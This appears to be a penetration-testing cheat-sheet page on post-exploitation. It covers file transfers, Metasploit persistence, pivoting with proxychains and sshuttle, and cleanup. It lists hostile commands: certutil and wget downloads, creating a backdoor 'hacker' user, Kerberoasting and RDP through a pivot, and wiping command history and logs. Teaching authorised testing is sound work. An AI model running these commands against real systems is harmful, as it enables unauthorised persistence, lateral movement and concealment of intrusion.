5. Post Exploitation

File transfers

# HTTP via Python
python3 -m http.server 80

# Windows - Certutil
certutil.exe -urlcache -f <URL-TO-FILE>

# Linux
wget <URL>

...

Maintain access

➡️ Maintaining access during a penetration test refers to the techniques used to retain control over a compromised system for extended periods, even after reboots or security updates. This is a crucial phase in post-exploitation, allowing testers to simulate real-world attacker persistence and assess an organization's ability to detect and respond to such threats.

Metasploit persistence methods

Persistence scripts:
- run persistence -h → Displays available persistence options.
- exploit/windows/local/persistence → Creates a backdoor using Metasploit.
- exploit/windows/local/registry_persistence → Modifies Windows Registry for persistence.
Scheduled Tasks:
- run scheduleme → Creates a scheduled task to execute payloads periodically.
- run schtaskabuse → Abuses schtasks to maintain system access.
User Account Manipulation:
- net user hacker password123 /add → Creates a new user account for persistent access.

These techniques help attackers maintain long-term access even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms.

Pivoting

➡️ Pivoting is a technique used in penetration testing to move laterally within a network after compromising an initial system. It allows an attacker to route traffic through the compromised machine to access other internal systems that are otherwise unreachable from the external network.

proxychains

➡️ - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies

cat /etc/proxychains4.conf
# check socks4 port

ssh -f -N -D 9050 -i pivot <USER>@<VICTIM-IP>

# e.g. pivoting
proxychains nmap -p <PORT> <VICTIM-IP>

proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <IP> -request

proxychains xfreerdp /u:administrator /p:'p@ssword' /v:<IP>

proxychains firefox

sshuttle

➡️ - transparent proxy server that forwards over SSH, supports DNS tunneling

sshuttle -r <USER>@<IP> <NEW-NETWORK/24> --ssh-cmd "ssh -i pivot"
# keep this terminal open
# run commands in other terminals

chisel

➡️ - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH

Cleaning up

➡️ The cleanup phase is the final step in a penetration test, ensuring that no traces of testing activities remain on the target system or network.

The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption.

Remove files – Delete scripts, executables, and added files
Eliminate persistence – Remove malware, backdoors, tasks, and added user accounts
Restore settings – Revert settings, security configs, firewall rules, and permissions.
Clear tracks – Wipe command history and logs.

📌 From a hacker perspective, you need to "make it look like you were never there".

PreviousAD - Case Studies Next6. Web Application

Last updated 3 months ago

Was this helpful?